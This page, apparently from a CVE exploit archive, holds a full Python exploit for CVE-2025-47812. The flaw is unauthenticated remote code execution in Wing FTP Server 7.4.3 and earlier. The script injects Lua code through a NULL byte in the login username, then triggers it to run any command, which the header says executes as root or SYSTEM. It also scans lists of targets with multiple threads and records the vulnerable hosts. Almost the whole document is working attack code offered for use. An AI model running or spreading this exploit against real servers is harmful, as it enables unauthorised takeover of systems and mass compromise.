5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.py PY
#!/usr/bin/env python3
# Exploit Title: Wing FTP Server 7.4.3 - Unauthenticated Remote Code Execution (RCE)
# CVE: CVE-2025-47812
# Date: 2025-06-30
# Original Exploit Author: Sheikh Mohammad Hasan aka 4m3rr0r (https://github.com/4m3rr0r)
# Modified by: d3vn0mi (https://github.com/d3vn0mi)
# Vendor Homepage: https://www.wftpserver.com/
# Version: Wing FTP Server <= 7.4.3
# Tested on: Linux (Root Privileges), Windows (SYSTEM Privileges)
# Description:
#   Wing FTP Server versions prior to 7.4.4 are vulnerable to an unauthenticated
#   remote code execution (RCE) flaw (CVE-2025-47812). This vulnerability arises from
#   improper handling of NULL bytes in the 'username' parameter during login, leading
#   to Lua code injection into session files. These maliciously crafted session files
#   are subsequently executed when authenticated functionalities (e.g., /dir.html) are
#   accessed, resulting in arbitrary command execution on the server with elevated
#   privileges (root on Linux, SYSTEM on Windows).

import argparse
import logging
import re
import sys
import time
from concurrent.futures import ThreadPoolExecutor, as_completed
from urllib.parse import quote, urlparse

import requests
import urllib3

# Suppress only the InsecureRequestWarning from urllib3 when --no-verify is used
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

BANNER = r"""
     ____  _______   ___   __ ____  __  ___ ____
    / __ \|__  /  | / / | / / __ \/  |/  //  _/
   / / / / /_ <| | / /| |/ / / / / /|_/ / / /
  / /_/ /___/ /| |/ / |   / /_/ / /  / /_/ /
 /_____/____/ |___/  |_/  \____/_/  /_/____/

  CVE-2025-47812 | Wing FTP Server <= 7.4.3
  Unauthenticated Remote Code Execution
  Original Author: 4m3rr0r | Modified: d3vn0mi
"""

# Default command used when no custom command is provided (safe check)
DEFAULT_CHECK_CMD = "echo CVE-2025-47812-VULN"
VULN_MARKER = "CVE-2025-47812-VULN"

# Configure module-level logger
logger = logging.getLogger("cve-2025-47812")


def setup_logging(verbose: bool = False, log_file: str | None = None) -> None:
    """Configure logging with console and optional file output."""
    level = logging.DEBUG if verbose else logging.INFO
    logger.setLevel(level)

    formatter = logging.Formatter(
        "%(asctime)s [%(levelname)s] %(message)s",
        datefmt="%Y-%m-%d %H:%M:%S",
    )

    # Console handler with color support
    console = logging.StreamHandler(sys.stderr)
    console.setLevel(level)
    console.setFormatter(_ColorFormatter(formatter))
    logger.addHandler(console)

    # Optional file handler (no colors)
    if log_file:
        fh = logging.FileHandler(log_file, encoding="utf-8")
        fh.setLevel(logging.DEBUG)
        fh.setFormatter(formatter)
        logger.addHandler(fh)
        logger.info("Logging to file: %s", log_file)


class _ColorFormatter(logging.Formatter):
    """Wrap an existing formatter to inject ANSI colors per level."""

    COLORS = {
        logging.DEBUG: "\033[90m",     # gray
        logging.INFO: "\033[92m",      # green
        logging.WARNING: "\033[93m",   # yellow
        logging.ERROR: "\033[91m",     # red
        logging.CRITICAL: "\033[95m",  # magenta
    }
    RESET = "\033[0m"

    def __init__(self, base_formatter: logging.Formatter):
        super().__init__()
        self._base = base_formatter

    def format(self, record: logging.LogRecord) -> str:
        msg = self._base.format(record)
        color = self.COLORS.get(record.levelno, "")
        return f"{color}{msg}{self.RESET}"


def validate_url(url: str) -> str:
    """Normalise and validate a target URL."""
    url = url.rstrip("/")
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https"):
        raise ValueError(f"Unsupported URL scheme: {parsed.scheme!r}")
    if not parsed.hostname:
        raise ValueError(f"Missing hostname in URL: {url!r}")
    return url


def build_payload(username: str, password: str, command: str) -> str:
    """Construct the injection payload for the login POST body."""
    encoded_username = quote(username)
    encoded_password = quote(password)
    # The NULL byte terminates the C string in c_CheckUser(), but the full
    # username (including Lua code) is written into the session file.
    lua_injection = (
        "%00]]%0d"
        f"local+h+%3d+io.popen(\"{command}\")%0d"
        "local+r+%3d+h%3aread(\"*a\")%0d"
        "h%3aclose()%0d"
        "print(r)%0d"
        "--"
    )
    return f"username={encoded_username}{lua_injection}&password={encoded_password}"


def run_exploit(
    target_url: str,
    command: str,
    username: str = "anonymous",
    password: str = "",
    timeout: int = 15,
    verify_ssl: bool = True,
    retries: int = 2,
) -> tuple[bool, str]:
    """
    Execute the CVE-2025-47812 exploit against a single target.

    Returns a tuple of (is_vulnerable: bool, output: str).
    """
    target_url = validate_url(target_url)
    host = urlparse(target_url).netloc

    common_headers = {
        "Host": host,
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:139.0) Gecko/20100101 Firefox/139.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate, br",
        "Connection": "keep-alive",
        "Upgrade-Insecure-Requests": "1",
    }

    login_url = f"{target_url}/loginok.html"
    payload = build_payload(username, password, command)

    login_headers = {
        **common_headers,
        "Content-Type": "application/x-www-form-urlencoded",
        "Origin": target_url,
        "Referer": f"{target_url}/login.html?lang=english",
        "Cookie": "client_lang=english",
    }

    # --- Stage 1: POST to inject Lua via session file ---
    logger.debug("Stage 1 -> POST %s (user=%s, cmd=%s)", login_url, username, command)
    login_response = _request_with_retry(
        "POST", login_url, headers=login_headers, data=payload,
        timeout=timeout, verify=verify_ssl, retries=retries,
    )
    if login_response is None:
        return False, ""

    set_cookie = login_response.headers.get("Set-Cookie", "")
    match = re.search(r"UID=([^;]+)", set_cookie)
    if not match:
        logger.error("UID not found in Set-Cookie for %s — exploit may have failed", target_url)
        return False, ""

    uid = match.group(1)
    logger.debug("Extracted UID: %s", uid)

    # --- Stage 2: GET /dir.html to trigger Lua execution ---
    dir_url = f"{target_url}/dir.html"
    dir_headers = {
        **common_headers,
        "Cookie": f"UID={uid}",
    }

    logger.debug("Stage 2 -> GET %s (UID=%s)", dir_url, uid)
    dir_response = _request_with_retry(
        "GET", dir_url, headers=dir_headers,
        timeout=timeout, verify=verify_ssl, retries=retries,
    )
    if dir_response is None:
        return False, ""

    # Extract command output (appears before XML response body)
    body = dir_response.text
    clean_output = re.split(r"<\?xml", body)[0].strip()
    is_vuln = bool(clean_output)

    if is_vuln:
        logger.info("VULNERABLE: %s", target_url)
    else:
        logger.warning("Not vulnerable: %s", target_url)

    return is_vuln, clean_output


def _request_with_retry(
    method: str,
    url: str,
    retries: int = 2,
    **kwargs,
) -> requests.Response | None:
    """Send an HTTP request with retry + exponential backoff on failure."""
    last_err = None
    for attempt in range(1, retries + 2):  # retries + 1 total attempts
        try:
            resp = requests.request(method, url, **kwargs)
            resp.raise_for_status()
            return resp
        except requests.exceptions.RequestException as exc:
            last_err = exc
            if attempt <= retries:
                wait = 2 ** attempt
                logger.warning(
                    "Request to %s failed (attempt %d/%d): %s — retrying in %ds",
                    url, attempt, retries + 1, exc, wait,
                )
                time.sleep(wait)
            else:
                logger.error("Request to %s failed after %d attempts: %s", url, attempt, exc)
    return None


def load_targets(url: str | None, filepath: str | None) -> list[str]:
    """Return a deduplicated list of target URLs from CLI args."""
    targets: list[str] = []
    if filepath:
        try:
            with open(filepath, "r") as fh:
                for line in fh:
                    stripped = line.strip()
                    if stripped and not stripped.startswith("#"):
                        targets.append(stripped)
        except OSError as exc:
            logger.error("Could not read target file %r: %s", filepath, exc)
            sys.exit(1)
    if url:
        targets.append(url)
    # Deduplicate while preserving order
    seen: set[str] = set()
    unique: list[str] = []
    for t in targets:
        normed = t.rstrip("/")
        if normed not in seen:
            seen.add(normed)
            unique.append(normed)
    return unique


def main() -> None:
    parser = argparse.ArgumentParser(
        description="CVE-2025-47812 — Wing FTP Server <= 7.4.3 Unauthenticated RCE",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="Examples:\n"
               "  %(prog)s -u http://192.168.1.10\n"
               "  %(prog)s -u http://192.168.1.10 -c 'id'\n"
               "  %(prog)s -f targets.txt -o vuln.txt -t 8\n",
    )

    target_group = parser.add_argument_group("target")
    target_group.add_argument(
        "-u", "--url", type=str,
        help="Single target URL (e.g. http://192.168.134.130)",
    )
    target_group.add_argument(
        "-f", "--file", type=str,
        help="File containing target URLs (one per line, # comments allowed)",
    )

    exploit_group = parser.add_argument_group("exploit options")
    exploit_group.add_argument(
        "-c", "--command", type=str,
        help="Command to execute on the remote server (enables verbose output)",
    )
    exploit_group.add_argument(
        "-U", "--username", type=str, default="anonymous",
        help="Username for the exploit payload (default: anonymous)",
    )
    exploit_group.add_argument(
        "-P", "--password", type=str, default="",
        help="Password for the exploit payload (default: empty)",
    )

    output_group = parser.add_argument_group("output")
    output_group.add_argument(
        "-v", "--verbose", action="store_true",
        help="Enable verbose / debug logging",
    )
    output_group.add_argument(
        "-o", "--output", type=str,
        help="Save vulnerable URLs to this file",
    )
    output_group.add_argument(
        "-l", "--log-file", type=str,
        help="Write detailed log to this file",
    )

    net_group = parser.add_argument_group("network")
    net_group.add_argument(
        "-t", "--threads", type=int, default=1,
        help="Number of concurrent threads for multi-target scans (default: 1)",
    )
    net_group.add_argument(
        "--timeout", type=int, default=15,
        help="HTTP request timeout in seconds (default: 15)",
    )
    net_group.add_argument(
        "--retries", type=int, default=2,
        help="Number of retries on connection failure (default: 2)",
    )
    net_group.add_argument(
        "--no-verify", action="store_true",
        help="Disable SSL certificate verification",
    )

    args = parser.parse_args()

    if not args.url and not args.file:
        parser.error("Either -u/--url or -f/--file must be specified.")

    # When a custom command is provided, force verbose so the user sees output
    verbose = args.verbose or bool(args.command)
    setup_logging(verbose=verbose, log_file=args.log_file)

    print(BANNER)

    command = args.command if args.command else DEFAULT_CHECK_CMD
    targets = load_targets(args.url, args.file)

    if not targets:
        logger.error("No valid targets provided.")
        sys.exit(1)

    logger.info("Loaded %d target(s) — threads=%d, timeout=%ds, retries=%d",
                len(targets), args.threads, args.timeout, args.retries)

    vulnerable: list[str] = []
    verify_ssl = not args.no_verify

    def _attack(target: str) -> tuple[str, bool, str]:
        is_vuln, output = run_exploit(
            target, command,
            username=args.username,
            password=args.password,
            timeout=args.timeout,
            verify_ssl=verify_ssl,
            retries=args.retries,
        )
        return target, is_vuln, output

    with ThreadPoolExecutor(max_workers=args.threads) as pool:
        futures = {pool.submit(_attack, t): t for t in targets}
        for future in as_completed(futures):
            target = futures[future]
            try:
                target, is_vuln, output = future.result()
            except Exception:
                logger.exception("Unhandled error processing %s", target)
                continue
            if is_vuln:
                vulnerable.append(target)
                if args.command:
                    print(f"\n--- Output from {target} ---")
                    print(output)
                    print("----------------------------\n")

    # Summary
    print()
    logger.info("Scan complete: %d/%d targets vulnerable", len(vulnerable), len(targets))

    if args.output and vulnerable:
        try:
            with open(args.output, "w") as out_file:
                for site in vulnerable:
                    out_file.write(site + "\n")
            logger.info("Vulnerable URLs saved to: %s", args.output)
        except OSError as exc:
            logger.error("Could not write to output file %r: %s", args.output, exc)


if __name__ == "__main__":
    main()